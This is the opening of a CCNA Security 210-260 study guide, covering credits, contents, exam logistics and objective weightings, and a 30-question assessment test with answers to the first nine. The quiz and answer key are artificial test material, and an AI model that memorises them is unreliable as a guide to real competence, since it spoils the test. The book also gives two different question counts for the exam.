CCNA Security Study Guide: Exam 210-260
Troy McMillan

Senior Acquisitions Editor: Kenyon Brown
Development Editor: David Clark
Technical Editors: Jon Buhagiar and Mark Dittmer
Production Manager: Kathleen Wisor
Copy Editor: Kim Wimpsett
Editorial Manager: Mary Beth Wakefield
Executive Editor: Jim Minatel
Book Designer: Judy Fung and Bill Gibson
Proofreader: Amy Schneider
Indexer: Johnna VanHoose Dinse
Project Coordinator, Cover: Brent Savage
Cover Designer: Wiley
Cover Image: © Jeremy Woodhouse/Getty Images, Inc.

Copyright © 2018 by John Wiley & Sons, Inc., Indianapolis, Indiana
Published simultaneously in Canada
ISBN: 978-1-119-40993-9
ISBN: 978-1-119-40991-5 (ebk.)
ISBN: 978-1-119-40988-5 (ebk.)
Manufactured in the United States of America

No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning or otherwise, except as permitted under Sections 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 646-8600. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748-6011, fax (201) 748-6008, or online at http://www.wiley.com/go/permissions.

Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No warranty may be created or extended by sales or promotional materials. The advice and strategies contained herein may not be suitable for every situation. This work is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional services. If professional assistance is required, the services of a competent professional person should be sought. Neither the publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or Web site is referred to in this work as a citation and/or a potential source of further information does not mean that the author or the publisher endorses the information the organization or Web site may provide or recommendations it may make. Further, readers should be aware that Internet Web sites listed in this work may have changed or disappeared between when this work was written and when it is read. For general information on our other products and services or to obtain technical support, please contact our Customer Care Department within the U.S. at (877) 762-2974, outside the U.S. at (317) 572-3993 or fax (317) 572-4002.

Wiley publishes in a variety of print and electronic formats and by print-on-demand. Some material included with standard print versions of this book may not be included in e-books or in print-on-demand. If this book refers to media such as a CD or DVD that is not included in the version you purchased, you may download this material at http://booksupport.wiley.com. For more information about Wiley products, visit www.wiley.com.

Library of Congress Control Number: 2017962360

TRADEMARKS: Wiley, the Wiley logo, and the Sybex logo are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. CCNA is a registered trademark of Cisco Technologies, Inc. All other trademarks are the property of their respective owners. John Wiley & Sons, Inc. is not associated with any product or vendor mentioned in this book.

For my best friend, Wade Long, for just being a good friend.

Acknowledgments
Special thanks go to David Clark for keeping me on schedule and ensuring all the details are correct. Also, I'd like to thank Jon Buhagiar for the excellent technical edit that saved me from myself at times. Finally, as always, I'd like to acknowledge Kenyon Brown for his continued support of all my writing efforts.

About the Author
Troy McMillan writes practice tests, study guides, and online course materials for Kaplan IT Training, while also running his own consulting and training business. He holds more than 30 industry certifications and also appears in training videos for OnCourse Learning and Pearson Press. Troy can be reached at mcmillantroy@hotmail.com.
Contents
Acknowledgments
About the Author
Introduction
  What Does This Book Cover?
  Interactive Online Learning Environment and Test Bank
  Who Should Read This Book
  How to Use This Book
  How Do You Go About Taking the Exam?
  Certification Exam Policies
  Assessment Test
  Answers to Assessment Test
Chapter 1 Understanding Security Fundamentals
  Goals of Security
  Network Topologies
  Common Network Security Zones
  Summary
  Exam Essentials
  Review Questions
Chapter 2 Understanding Security Threats
  Common Network Attacks
  Social Engineering
  Malware
  Data Loss and Exfiltration
  Summary
  Exam Essentials
  Review Questions
Chapter 3 Understanding Cryptography
  Symmetric and Asymmetric Encryption
  Hashing Algorithms
  Key Exchange
  Public Key Infrastructure
  Summary
  Exam Essentials
  Review Questions
Chapter 4 Securing the Routing Process
  Securing Router Access
  Implementing OSPF Routing Update Authentication
  Securing the Control Plane
  Summary
  Exam Essentials
  Review Questions
Chapter 5 Understanding Layer 2 Attacks
  Understanding STP Attacks
  Understanding ARP Attacks
  Understanding MAC Attacks
  Understanding CAM Overflows
  Understanding CDP/LLDP Reconnaissance
  Understanding VLAN Hopping
  Understanding DHCP Spoofing
  Summary
  Exam Essentials
  Review Questions
Chapter 6 Preventing Layer 2 Attacks
  Configuring DHCP Snooping
  Configuring Dynamic ARP Inspection
  Configuring Port Security
  Configuring STP Security Features
  Disabling DTP
  Verifying Mitigations
  Summary
  Exam Essentials
  Review Questions
Chapter 7 VLAN Security
  Native VLANs
  PVLANs
  ACLs on Switches
  Summary
  Exam Essentials
  Review Questions
Chapter 8 Securing Management Traffic
  In-Band and Out-of-Band Management
  Securing Network Management
  Securing Access through SNMPv3
  Securing NTP
  Using SCP for File Transfer
  Summary
  Exam Essentials
  Review Questions
Chapter 9 Understanding 802.1x and AAA
  802.1x Components
  RADIUS and TACACS+ Technologies
  Configuring Administrative Access with TACACS+
  Understanding Authentication and Authorization Using ACS and ISE
  Understanding the Integration of Active Directory with AAA
  Summary
  Exam Essentials
  Review Questions
Chapter 10 Securing a BYOD Initiative
  The BYOD Architecture Framework
  The Function of Mobile Device Management
  Summary
  Exam Essentials
  Review Questions
Chapter 11 Understanding VPNs
  Understanding IPsec
  Understanding Advanced VPN Concepts
  Summary
  Exam Essentials
  Review Questions
Chapter 12 Configuring VPNs
  Configuring Remote Access VPNs
  Configuring Site-to-Site VPNs
  Summary
  Exam Essentials
  Review Questions
Chapter 13 Understanding Firewalls
  Understanding Firewall Technologies
  Stateful vs. Stateless Firewalls
  Summary
  Exam Essentials
  Review Questions
Chapter 14 Configuring NAT and Zone-Based Firewalls
  Implementing NAT on ASA 9.x
  Configuring Zone-Based Firewalls
  Summary
  Exam Essentials
  Review Questions
Chapter 15 Configuring the Firewall on an ASA
  Understanding Firewall Services
  Understanding Modes of Deployment
  Understanding Methods of Implementing High Availability
  Understanding Security Contexts
  Configuring ASA Management Access
  Configuring Cisco ASA Interface Security Levels
  Configuring Security Access Policies
  Configuring Default Cisco Modular Policy Framework (MPF)
  Summary
  Exam Essentials
  Review Questions
Chapter 16 Intrusion Prevention
  IPS Terminology
  Evasion Techniques
  Introducing Cisco FireSIGHT
  Understanding Modes of Deployment
  Positioning of the IPS within the Network
  Understanding False Positives, False Negatives, True Positives, and True Negatives
  Summary
  Exam Essentials
  Review Questions
Chapter 17 Content and Endpoint Security
  Mitigating Email Threats
  Mitigating Web-Based Threats
  Mitigating Endpoint Threats
  Summary
  Exam Essentials
  Review Questions
Appendix Answers to Review Questions
  Chapter 1: Understanding Security Fundamentals
  Chapter 2: Understanding Security Threats
  Chapter 3: Understanding Cryptography
  Chapter 4: Securing the Routing Process
  Chapter 5: Understanding Layer 2 Attacks
  Chapter 6: Preventing Layer 2 Attacks
  Chapter 7: VLAN Security
  Chapter 8: Securing Management Traffic
  Chapter 9: Understanding 802.1x and AAA
  Chapter 10: Securing a BYOD Initiative
  Chapter 11: Understanding VPNs
  Chapter 12: Configuring VPNs
  Chapter 13: Understanding Firewalls
  Chapter 14: Configuring NAT and Zone-Based Firewalls
  Chapter 15: Configuring the Firewall on an ASA
  Chapter 16: Intrusion Prevention
  Chapter 17: Content and Endpoint Security
Advert
EULA
List of Tables
Chapter 1
  TABLE 1.1
Chapter 3
  TABLE 3.1
  TABLE 3.2
Chapter 9
  TABLE 9.1
Chapter 16
  TABLE 16.1
List of Illustrations
Chapter 1
  FIGURE 1.1 Defense in depth
  FIGURE 1.2 Security cycle
  FIGURE 1.3 Campus area network
Chapter 2
  FIGURE 2.1 Ping scan with nmap
  FIGURE 2.2 TCP header
  FIGURE 2.3 NULL scan
  FIGURE 2.4 XMAS scan
  FIGURE 2.5 TCP handshake
  FIGURE 2.6 SYN flood
  FIGURE 2.7 Ping-of-death packet
  FIGURE 2.8 Direct DDoS
  FIGURE 2.9 Smurf attack
Chapter 3
  FIGURE 3.1 ROT13 Caesar cipher
  FIGURE 3.2 Vigenère cipher
  FIGURE 3.3 ECB process
  FIGURE 3.4 CBC process
  FIGURE 3.5 Hash process
  FIGURE 3.6 HMAC process
  FIGURE 3.7 Digital signature process
  FIGURE 3.8 PKI encryption
  FIGURE 3.9 PKI digital signature
  FIGURE 3.10 SSL process
  FIGURE 3.11 PKI hierarchy
  FIGURE 3.12 Cross certification
  FIGURE 3.13 Viewing certificates
Chapter 4
  FIGURE 4.1 CoPP
  FIGURE 4.2 Modular policy framework
Chapter 5
  FIGURE 5.1 STP attack
  FIGURE 5.2 ARP process
  FIGURE 5.3 ARP cache poisoning
  FIGURE 5.4 MAC spoofing
  FIGURE 5.5 CAM overflow
  FIGURE 5.6 Switch spoofing
  FIGURE 5.7 Double tagging
  FIGURE 5.8 DHCP spoofing
Chapter 6
  FIGURE 6.1 DHCP snooping
  FIGURE 6.2 DAI in action
  FIGURE 6.3 BPDU Guard in action
Chapter 7
  FIGURE 7.1 PVLANs
  FIGURE 7.2 PVLAN proxy attack
Chapter 8
  FIGURE 8.1 Partial MIB
  FIGURE 8.2 NTP authentication process
Chapter 9
  FIGURE 9.1 802.1x
Chapter 10
  FIGURE 10.1 ISE context-based access
  FIGURE 10.2 CMD
  FIGURE 10.3 SXP and SGT
  FIGURE 10.4 Permission matrix
  FIGURE 10.5 MDM with IDE
  FIGURE 10.6 ISE authorization policy integration
Chapter 11
  FIGURE 11.1 Diffie-Hellman
  FIGURE 11.2 IKE phase 1
  FIGURE 11.3 Matching ISAKMP parameters
  FIGURE 11.4 AH process
  FIGURE 11.5 AH in tunnel mode
  FIGURE 11.6 ESP in tunnel mode
  FIGURE 11.7 AH in transport mode
  FIGURE 11.8 ESP in transport mode
  FIGURE 11.9 IPv6 header with extensions
  FIGURE 11.10 The need for hairpinning
  FIGURE 11.11 Hairpin configuration
  FIGURE 11.12 Split tunneling
  FIGURE 11.13 Preferences (Part 2) window
  FIGURE 11.14 NAT traversal
Chapter 12
  FIGURE 12.1 Supported SSL/TLS algorithms
Chapter 13
  FIGURE 13.1 TCP three-way handshake
  FIGURE 13.2 Stateful firewall operation
Chapter 14
  FIGURE 14.1 Multiple class maps
  FIGURE 14.2 Reuse of class maps
  FIGURE 14.3 Default policies
  FIGURE 14.4 Default policies (self-zone)
Chapter 15
  FIGURE 15.1 Active/Standby failover
  FIGURE 15.2 Active/Active failover
  FIGURE 15.3 Clustering
  FIGURE 15.4 Security contexts
  FIGURE 15.5 Security levels in action
Chapter 16
  FIGURE 16.1 IP header fragmentation flags
  FIGURE 16.2 Fragmentation process
  FIGURE 16.3 Fragmentation attack
  FIGURE 16.4 Injection attack
  FIGURE 16.5 SPAN
  FIGURE 16.6 Tap
  FIGURE 16.7 Inline mode
  FIGURE 16.8 Outside deployment
  FIGURE 16.9 DMZ deployment
  FIGURE 16.10 Inside deployment
Chapter 17
  FIGURE 17.1 File retrospection
  FIGURE 17.2 ESA inbound
  FIGURE 17.3 ESA outbound
  FIGURE 17.4 Incoming mail processing
  FIGURE 17.5 Outgoing mail processing
Introduction
The CCNA Security certification program is one of the elective paths you can take when achieving the CCNA. It requires passing the CCENT exam (100-105) and then passing the CCNA Security exam (210-260).

The Cisco Security exam objectives are periodically updated to keep the certification applicable to the most recent hardware and software. This is necessary because a technician must be able to work on the latest equipment. The most recent revisions to the objectives, and to the whole program, were introduced in 2016 and are reflected in this book.

This book and the Sybex CCNA Security+ Complete Study Guide (both the Standard and Deluxe editions) are tools to help you prepare for this certification, and for the new areas of focus of a modern server technician's job.

What Is the CCNA Security Certification?
Cisco Certified Network Associate Security (CCNA Security) validates associate-level knowledge and skills required to secure Cisco networks. With a CCNA Security certification, a network professional demonstrates the skills required to develop a security infrastructure, recognize threats and vulnerabilities to networks, and mitigate security threats. The CCNA Security curriculum emphasizes core security technologies; the installation, troubleshooting, and monitoring of network devices to maintain integrity, confidentiality, and availability of data and devices; and competency in the technologies that Cisco uses in its security structure.

The CCNA Security certification isn't awarded until you've passed the two tests. For the latest pricing on the exams and updates to the registration procedures, call Pearson VUE at (877) 551-7587. You can also go to Pearson VUE's website at www.vue.com for additional information or to register online. If you have further questions about the scope of the exams, see https://www.cisco.com/c/en/us/training-events/training-certifications/certifications/associate/ccna-security.html.
What Does This Book Cover?
Here is a glance at what's in each chapter.

Chapter 1: Understanding Security Fundamentals covers common security principles such as the CIA triad; common security terms such as risk, vulnerability, and threat; the proper application of common security zones, such as intranet, DMZ, and extranets; a discussion of network topologies as seen from the perspective of the Cisco Campus Area network; and methods of network segmentation such as VLANs.

Chapter 2: Understanding Security Threats covers common network attacks and their motivations; attack vectors such as malicious and non-malicious insiders and outsiders, terrorists, spies, and terminated personnel; various methods used to perform network reconnaissance such as ping scans and port scans; types of malware; and the exfiltration of sensitive data such as IP, PII, and credit card data.

Chapter 3: Understanding Cryptography covers symmetric and asymmetric key cryptography, the hashing process, major hashing algorithms, PKI and the components that make it function, and common attacks on cryptography.

Chapter 4: Securing the Routing Process covers methods of securing administrative access to the router, IOS privilege levels, IOS role-based CLI access, Cisco IOS resilient configuration, authentication for router updates for both OSPF and EIGRP, and control plane policing.

Chapter 5: Understanding Layer 2 Attacks covers STP attacks such as rogue switches, ARP spoofing, MAC spoofing, and CAM overflow. It also discusses both the value and the danger in using CDP and LLDP. Finally, you will learn how VLAN hopping attacks are performed.

Chapter 6: Preventing Layer 2 Attacks covers DHCP snooping, DAI and how it can prevent ARP poisoning attacks, preventing MAC overflow attacks and the introduction of unauthorized devices to switch ports by using port security, and the use of BPDU Guard, Root Guard, and Loop Guard, all STP features designed to prevent changes to the STP topology.

Chapter 7: VLAN Security covers preventing VLAN hopping attacks that take advantage of the native VLAN; private VLANs; setting ports as promiscuous, community, and isolated; the PVLAN Edge feature; and using ACLs to prevent a PVLAN proxy attack.

Chapter 8: Securing Management Traffic covers managing devices in-band and out-of-band; methods of securing management interfaces, including enabling the HTTPS server, securing SNMPv3 with a security policy, applying passwords to all management interfaces, and using SSH for remote management; types of banner message; and securing the NTP protocol.

Chapter 9: Understanding 802.1x and AAA covers AAA service that can be provided by TACACS+ and RADIUS servers, configuring administrative access to a router using TACACS+, how AAA can be integrated with Active Directory, the Cisco implementations of a RADIUS server including the Cisco Secure Access Control Server (ACS) and the Cisco Identity Services Engine (ISE), and the functions of various 802.1X components.

Chapter 10: Securing a BYOD Initiative covers challenges involved in supporting a BYOD initiative, components provided by Cisco for this including the Cisco Identity Services Engine (ISE), and the Cisco TrustSec provisioning and management platform. It also covers advanced features of Cisco ISE, including downloadable ACLs (dACLs), automatic VLAN assignment, security group access (SGAs), change of authorization (COA), and posture assessment. Further, we discuss the authentication mechanisms ISE can accept, including 802.1x, MAC authentication bypass (MAB), and web authentication (WebAuth). Finally, we end the chapter covering the three main functions of TrustSec.

Chapter 11: Understanding VPNs covers IPsec and the security services it provides; the components of IPsec such as ISAKMP, IKE, AH, and ESP; how to use hairpinning to allow traffic between two hosts to connect to the same VPN interface; and split tunneling and its benefits.

Chapter 12: Configuring VPNs covers the value of the Cisco clientless SSL VPN and the steps required to configure it, the Cisco AnyConnect SSL VPN, modules in the Cisco AnyConnect client that can provide endpoint posture assessment, and how to implement an IPsec site-to-site VPN with preshared key authentication.

Chapter 13: Understanding Firewalls covers various firewall technologies such as proxy, application, personal, and stateful firewalls, with stateful firewalls covered in greater detail and described in relation to the operation of these firewalls and the TCP three-way handshake. Finally, you learn what is contained in the state table of a stateful firewall.

Chapter 14: Configuring NAT and Zone-Based Firewalls covers three forms of NAT: static NAT, dynamic NAT, and PAT; the NAT options available in the ASA; the benefits of NAT; and how to configure it and verify its operation. You will learn about class maps, policy maps, and service policies and their respective functions in a zone-based firewall. Finally, the steps to configure and verify a zone-based firewall end the chapter.

Chapter 15: Configuring the Firewall on an ASA covers how to set up the ASA so you can remotely administer it using the ASDM; the default security policies that are in place; how the default global policy interacts with configured policies; how interface security levels affect traffic flows; how the Cisco Modular Policy Framework is used to create policies; the difference between a transparent and a routed firewall; and high availability solutions including active-active, active-passive, and clustering approaches.

Chapter 16: Intrusion Prevention covers general IPS concepts such as network-based and host-based deployments; modes of deployment such as inline, SPAN, and tap; the positioning options available; false positives and false negatives; how rules and signatures are used in the process of identifying potential attacks; and trigger actions of which an IPS might be capable, such as dropping, resetting, and alerting.

Chapter 17: Content and Endpoint Security covers mitigation techniques available when using the Cisco Email Security Appliance, including reputation and context-based filtering, and the Cisco Web Security Appliance, which uses blacklisting, URL filtering, and malware scanning to secure web traffic and web applications. Finally, the chapter discusses endpoint protection provided by the Cisco Identity Services Engine and Cisco TrustSec technology.
Interactive Online Learning Environment and Test Bank
We've put together some really great online tools to help you pass the CCNA Security exam. The interactive online learning environment that accompanies the CCNA Security exam certification guide provides a test bank and study tools to help you prepare for the exam. By using these tools you can dramatically increase your chances of passing the exam on your first try.

The online test bank includes the following:

Sample Tests  Many sample tests are provided throughout this book and online, including the Assessment Test, which you'll find at the end of this introduction, and the Chapter Tests that include the review questions at the end of each chapter. In addition, there are two bonus practice exams. Use these questions to test your knowledge of the study guide material. The online test bank runs on multiple devices.

Flashcards  The online test bank includes 100 flashcards specifically written to hit you hard, so don't get discouraged if you don't ace your way through them at first! They're there to ensure that you're really ready for the exam. And no worries: armed with the review questions, practice exams, and flashcards, you'll be more than prepared when exam day comes! Questions are provided in digital flashcard format (a question followed by a single correct answer). You can use the flashcards to reinforce your learning and provide last-minute test prep before the exam.

Resources  A glossary of key terms from this book and their definitions is available as a fully searchable PDF.

Go to http://www.wiley.com/go/Sybextestprep to register and gain access to this interactive online learning environment and test bank with study tools.
Who Should Read This Book
If you want to acquire a solid foundation in managing security on Cisco devices or your goal is to prepare for the exams by filling in any gaps in your knowledge, this book is for you. You'll find clear explanations of the concepts you need to grasp and plenty of help to achieve the high level of professional competency you need in order to succeed in your chosen field.

If you want to become certified as a CCNA Security professional, this book is definitely what you need. However, if you just want to attempt to pass the exam without really understanding the basics of personal computers, this guide isn't for you. It's written for people who want to acquire skills and knowledge of servers and storage systems.

How to Use This Book
If you want a solid foundation for the serious effort of preparing for the Cisco CCNA Security exam, then look no further. We've spent hundreds of hours putting together this book with the sole intention of helping you to pass the exam as well as really learn about the exciting field of network security!

This book is loaded with valuable information, and you will get the most out of your study time if you understand why the book is organized the way it is.

So, to maximize your benefit from this book, I recommend the following study method:

1. Take the assessment test that's provided at the end of this introduction. (The answers are at the end of the test.) It's okay if you don't know any of the answers; that's why you bought this book! Carefully read over the explanations for any questions you get wrong and note the chapters in which the material relevant to them is covered. This information should help you plan your study strategy.
2. Study each chapter carefully, making sure you fully understand the information and the test objectives listed at the beginning of each one. Pay extra-close attention to any chapter that includes material covered in questions you missed.
3. Complete all hands-on labs in each chapter, referring to the text of the chapter so that you understand the reason for each step you take.
4. Answer all of the review questions related to each chapter. (The answers appear in the Appendix.) Note the questions that confuse you, and study the topics they cover again until the concepts are crystal clear. And again: do not just skim these questions! Make sure you fully comprehend the reason for each correct answer. Remember that these will not be the exact questions you will find on the exam, but they're written to help you understand the chapter material and ultimately pass the exam!
5. Try your hand at the practice questions that are exclusive to this book. The questions can be found at http://www.sybex.com/go/ccnasecuritystudyguide.
6. Test yourself using all the flashcards, which are also found at the download link. These are brand-new and updated flashcards to help you prepare for the CCNA Security exam and a wonderful study tool!

To learn every bit of the material covered in this book, you'll have to apply yourself regularly, and with discipline. Try to set aside the same time period every day to study, and select a comfortable and quiet place to do so. I'm confident that if you work hard, you'll be surprised at how quickly you learn this material!

If you follow these steps and really study in addition to using the review questions, the practice exams, and the electronic flashcards, it would actually be hard to fail the CCNA Security exam. But understand that studying for the Cisco exams is a lot like getting in shape: if you do not go to the gym every day, it's not going to happen!
According to the Cisco website, the Cisco CCNA Security exam details are as follows:

Exam code: 210-260
Exam description: This exam tests the candidate's knowledge of secure network infrastructure, understanding core security concepts, managing secure access, VPN encryption, firewalls, intrusion prevention, web and email content security, and endpoint security using Cisco routers and the ASA 9.x.
Number of questions: 60–70
Type of questions: multiple choice, drag and drop, testlet, simulation
Length of test: 90 minutes
Passing score: 860 (on a scale of 100–900)
Language: English
How Do You Go About Taking the Exam?
When the time comes to schedule your exam, you will need to create an account at http://www.pearsonvue.com/cisco/ and register for your exam. Cisco testing is provided by their global testing partner Pearson VUE. You can locate your closest testing center at https://home.pearsonvue.com/. You can schedule at any of the listed testing centers.

To purchase the exam, you will need to buy an exam voucher from Cisco. The voucher is a code they provide you to use to schedule the exam. Information on purchasing a voucher can be found at http://www.pearsonvue.com/vouchers/pricelist/cisco.asp.

When you have a voucher and have selected a testing center, you can schedule the Cisco 210-260 exam by following this link: http://www.pearsonvue.com/cisco/. This will take you to the Pearson VUE website, and from here you can also locate a testing center or purchase vouchers if you have not already done so.

When you have registered for the CCNA Security certification exam, you will receive a confirmation e-mail that supplies you with all of the information you will need to take the exam. Remember to take a printout of this e-mail with you to the testing center.
Certification Exam Policies
For the most current information regarding Cisco exam policies, it is recommended that you follow the https://www.cisco.com/c/en/us/training-events/training-certifications/exams/policies.html link to become familiar with Cisco policies. It contains a large amount of useful information regarding:

Exam policy requirements
  Age requirements and policies concerning minors
  Certification and confidentiality agreement
  Candidate identification and authentication
  Candidate rights and responsibilities
  Confidentiality and agreements
  Embargoed country policy
  Privacy
Exam and testing policies
  Conduct
  Confidentiality and agreements
  Exam discounts, vouchers, and promotional codes
  Exam violations
  Preliminary score report
  Retaking exams
Post exam policies
  Certification tracking system
  Correspondence
  Exam recertification
  Exam retirement
  Exam scoring
  Logo guidelines
Tips for Taking Your Exam
The Cisco CCNA Security exam contains 60–90 multiple choice, drag and drop, testlet, and simulation item questions, and must be completed in 90 minutes or less. This information may change over time, and it is advised to check www.cisco.com for the latest updates.

Many questions on the exam offer answer choices that at first glance look identical, especially the syntax questions! So remember to read through the choices carefully because close just doesn't cut it. If you get information in the wrong order or forget one measly character, you may get the question wrong. So, to practice, do the practice exams and hands-on exercises in this book's chapters over and over again until they feel natural to you; also, and this is very important, do the online sample test until you can consistently answer all the questions correctly. Relax, read the question over and over until you are 100% clear on what it is asking, and then you can usually eliminate a few of the obviously wrong answers.

Here are some general tips for exam success:

Arrive early at the exam center so you can relax and review your study materials.
Read the questions carefully. Don't jump to conclusions. Make sure you're clear about exactly what each question asks. "Read twice, answer once!"
Ask for a piece of paper and pencil if it is offered to take down quick notes and make sketches during the exam.
When answering multiple-choice questions that you're not sure about, use the process of elimination to get rid of the obviously incorrect answers first. Doing this greatly improves your odds if you need to make an educated guess.

After you complete an exam, you'll get immediate notification of your pass or fail status, a printed examination score report that indicates your pass or fail status, and your exam results by section. (The test administrator will give you the printed score report.) Test scores are automatically forwarded to Cisco after you take the test, so you don't need to send your score to them. If you pass the exam, you'll receive confirmation from Cisco and a package in the post with a nice document suitable for framing showing that you are now a Cisco certified engineer.
Exam Objectives
Cisco goes to great lengths to ensure that its certification programs accurately reflect the IT industry's best practices. The company does this by establishing Cornerstone Committees for each of its exam programs. Each committee comprises a small group of IT professionals, training providers, and publishers who are responsible for establishing the exam's baseline competency level and who determine the appropriate target audience level.

Once these factors are determined, Cisco shares this information with a group of hand-selected subject-matter experts (SMEs). These folks are the true brainpower behind the certification program. They review the committee's findings, refine them, and shape them into the objectives you see before you. Cisco calls this process a job task analysis (JTA).

Finally, Cisco conducts a survey to ensure that the objectives and weightings truly reflect the job requirements. Only then can the SMEs go to work writing the hundreds of questions needed for the exam. And, in many cases, they have to go back to the drawing board for further refinements before the exam is ready to go live in its final state. So, rest assured, the content you're about to learn will serve you long after you take the exam.

Cisco also publishes relative weightings for each of the exam's objectives. The following table lists the objective domains and the extent to which they're represented on each exam.
210-260 Exam Domains                         % of Exam
1.0 Security Concepts                        12%
2.0 Secure Access                            14%
3.0 VPN                                      17%
4.0 Secure Routing and Switching             18%
5.0 Cisco Firewall Technologies              18%
6.0 IPS                                       9%
7.0 Content and Endpoint Security            12%
Total                                       100%

210-260 Sub Domains                                                                    Chapters
1.2 Common security threats                                                            2
1.3 Cryptography concepts                                                              2
1.4 Describe network topologies                                                        3
2.1 Secure management                                                                  8
2.2 AAA concepts                                                                       9
2.3 802.1x authentication                                                              9
2.4 BYOD                                                                               10
3.1 VPN concepts                                                                       11
3.2 Remote access VPN                                                                  12
3.3 Site-to-site VPN                                                                   12
4.1 Security on Cisco routers                                                          4
4.2 Securing routing protocols                                                         4
4.3 Securing the control plane                                                         4
4.4 Common Layer 2 attacks                                                             5
4.5 Mitigation procedures                                                              6
4.6 VLAN security                                                                      7
5.1 Describe operational strengths and weaknesses of the different firewall technologies  13
5.2 Compare stateful vs. stateless firewalls                                           13
5.3 Implement NAT on Cisco ASA 9.x                                                     14
5.4 Implement zone-based firewall                                                      14
5.5 Firewall features on the Cisco Adaptive Security Appliance (ASA) 9.x               15
6.1 Describe IPS deployment considerations                                             16
6.2 Describe IPS technologies                                                          16
7.1 Describe mitigation technology for email-based threats                             17
7.2 Describe mitigation technology for web-based threats                               17
7.3 Describe mitigation technology for endpoint threats                                17
Assessment Test
1. When you are concerned with preventing data from unauthorized edits, you are concerned with which of the following?
A. integrity
B. confidentiality
C. availability
D. authorization
2. When a systems administrator is issued both an administrative-level account and a normal user account and uses the administrative account only when performing an administrative task, it is an example of which concept?
A. least privilege
B. split knowledge
C. dual control
D. separation of duties
3. What is the purpose of mandatory vacations?
A. cross training
B. fraud prevention
C. improves morale
D. employee retention
4. Which of the following occurs when an organizational asset is exposed to losses?
A. risk
B. threat
C. exposure
D. vulnerability
5. Which of the following is a standard used by the security automation community to enumerate software flaws and configuration issues?
A. CSE
B. SCAP
C. CVE
D. CWE
6. Which hacker type hacks for a political cause?
A. black hats
B. white hats
C. script kiddies
D. hacktivists
7. Which of the following is an email validation system that works by using DNS to determine whether an email sent by someone has been sent by a host sanctioned by that domain's administrator?
A. PGP
B. S/MIME
C. SMTP
D. SPF
8. What does the following command do?
nmap -sP 192.168.0.0-100
A. port scan
B. ping scan
C. vulnerability scan
D. penetration test
9. You just executed a half open scan and got no response. What does that tell you?
A. the port is open
B. the port is closed
C. the port is blocked
D. it cannot be determined
10. Which of the following is a mitigation for a buffer overflow?
A. antivirus software
B. IOS updates
C. input validation
D. encryption
11. Which of the following is a Layer 2 attack?
A. buffer overflow
B. DoS
C. ARP poisoning
D. IP spoofing
12. Which of the following is not intellectual property?
A. designs
B. advertisements
C. recipes
D. contact lists
13. What is the best countermeasure to social engineering?
A. training
B. access lists
C. HIDS
D. encryption
14. Which of the following is a mitigation for ARP poisoning?
A. VLANs
B. DAI
C. DNSSec
D. STP
15. In which cryptographic attack does the attacker use recurring patterns to reverse engineer the message?
A. side channel
B. frequency
C. plaintext only
D. ciphertext only
16. You have five users in your department. These five users only need to encrypt information with one another. If you implement a symmetric encryption algorithm, how many keys will be needed to support the department?
A. 5
B. 8
C. 10
D. 12
17. Which statement is true with regard to asymmetric encryption?
A. less expensive than symmetric
B. slower than symmetric
C. harder to crack than symmetric
D. key compromise can occur more easily than with symmetric
18. Which of the following is a stream-based cipher?
A. RC4
B. DES
C. 3DES
D. AES
19. What is the purpose of an IV?
A. doubles the encryption
B. adds randomness
C. performs 16 rounds of transposition
D. hashes the message
20. Which step is not required to configure SSH on a router?
A. Set the router name
B. Set the router ID
C. Set the router domain name
D. Generate the RSA key
21. Which of the following allows you to assign a technician sets of activities that coincide with the level they have been assigned?
A. access levels
B. job parameters
C. privilege levels
D. rules
22. Which of the following is a way to prevent unwanted changes to the configuration?
A. router lockdown
B. resilient configuration
C. secure IOS
D. config-sec
23. Which of the following is used to hold multiple keys used in OSPF Routing Update Authentication?
A. keystore
B. keychain
C. keydb
D. keyauth
24. Which of the following characteristics of a rogue switch could cause it to become the root bridge?
A. higher MAC address
B. higher IP address
C. a superior BPDU
D. lower router ID
25. Which of the following is used by a malicious individual to pollute the ARP cache of other machines?
A. ping of death
B. buffer overflow
C. bound violation
D. gratuitous ARP
26. What happens when the CAM table of a switch is full of fake MAC addresses and can hold no other MAC addresses?
A. it gets dumped
B. the switch shuts down
C. the switch starts forwarding all traffic out of all ports
D. all ports are shut down
27. Which switch feature uses the concept of trusted and untrusted ports?
A. DAI
B. DHCP snooping
C. STP
D. Root Guard
28. Which command enables port security on the switch?
A. SW70(config-if)#switchport mode access
B. SW70(config-if)#switchport port-security maximum 2
C. SW70(config-if)#switchport port-security
D. SW70(config-if)#switchport port-security violation shutdown
29. Which switch feature prevents the introduction of a rogue switch to the topology?
A. Root Guard
B. BPDU Guard
C. Loop Guard
D. DTP
30. What prevents switching loops?
A. DAI
B. DHCP snooping
C. STP
D. Root Guard
Answers to Assessment Test
1. A. Integrity, the second part of the CIA triad, ensures that data is protected from unauthorized modification or data corruption. The goal of integrity is to preserve the consistency of data, including data stored in files, databases, systems, and networks.
2. A. The principle of least privilege requires that a user or process is given only the minimum access privilege needed to perform a particular task.
3. B. With mandatory vacations, all personnel are required to take time off, allowing other personnel to fill their position while gone. This detective administrative control enhances the opportunity to discover unusual activity.
4. C. An exposure occurs when an organizational asset is exposed to losses.
5. B. Security Content Automation Protocol (SCAP) is a standard used by the security automation community to enumerate software flaws and configuration issues. It standardized the nomenclature and formats used.
6. D. Hacktivists are those who hack not for personal gain, but to further a cause. For example, the Anonymous group hacks from time to time for various political reasons.
7. D. Sender Policy Framework (SPF) is an email validation system that works by using DNS to determine whether an email sent by someone has been sent by a host sanctioned by that domain's administrator. If it can't be validated, it is not delivered to the recipient's box.
8. B. 0–100 is the range of IP addresses to be scanned in the 192.168.0.0 network.
9. C. If you receive no response, the port is blocked on the firewall.
